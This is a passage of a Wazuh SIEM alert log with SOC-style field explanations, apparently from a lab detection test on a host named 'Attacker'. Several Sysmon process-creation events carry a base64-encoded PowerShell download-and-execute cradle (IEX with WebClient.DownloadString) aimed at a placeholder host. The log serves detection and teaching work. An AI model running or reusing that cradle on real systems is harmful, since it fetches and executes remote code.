data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:02.553 ProcessGuid: {94294ddc-bdc0-680a-bd0b-000000000e00} ProcessId: 16112 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_n3jscojm.st0.ps1 CreationUtcTime: 2025-04-24 22:40:02.553 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:02.553
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdc0-680a-bd0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16112
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_n3jscojm.st0.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:02.553
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:40:06.481+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:06.481+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19012
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.7.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534406.1968184
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26161
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Audit Policy Change' is set to include 'Success'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory reports changes in audit policy including SACL changes. Events for this subcategory include: - 4715: The audit policy (SACL) on an object was changed. - 4719: System audit policy was changed. - 4902: The Per-user audit policy table was created. - 4904: An attempt was made to register a security event source. - 4905: An attempt was made to unregister a security event source. - 4906: The CrashOnAuditFail value has changed. - 4907: Auditing settings on object were changed. - 4908: Special Groups Logon table modified. - 4912: Per User Audit Policy was changed. The recommended state for this setting is to include: Success.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing these events may be useful when investigating a security incident.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Audit Policy Change
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.7.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Audit Policy Change"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"Audit Policy Change"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  passed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:07.385+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:07.385+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  100
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534407.1971685
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:04.7532925Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285708
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:04.088 ProcessGuid: {94294ddc-bdc4-680a-bf0b-000000000e00} ProcessId: 15516 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdc0-680a-bd0b-000000000e00} ParentProcessId: 16112 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:04.088
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdc4-680a-bf0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdc0-680a-bd0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16112
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:07.481+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:07.481+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  104
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534407.1979756
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:04.9670806Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285714
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:04.958 ProcessGuid: {94294ddc-bdc4-680a-bf0b-000000000e00} ProcessId: 15516 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_wykul3a2.t0d.ps1 CreationUtcTime: 2025-04-24 22:40:04.958 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:04.958
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdc4-680a-bf0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wykul3a2.t0d.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:04.958
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:08.758+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:08.758+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  101
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534408.1982525
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:06.4519847Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285733
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:05.956 ProcessGuid: {94294ddc-bdc5-680a-c20b-000000000e00} ProcessId: 16460 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdc4-680a-bf0b-000000000e00} ParentProcessId: 15516 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:05.956
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdc5-680a-c20b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16460
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdc4-680a-bf0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

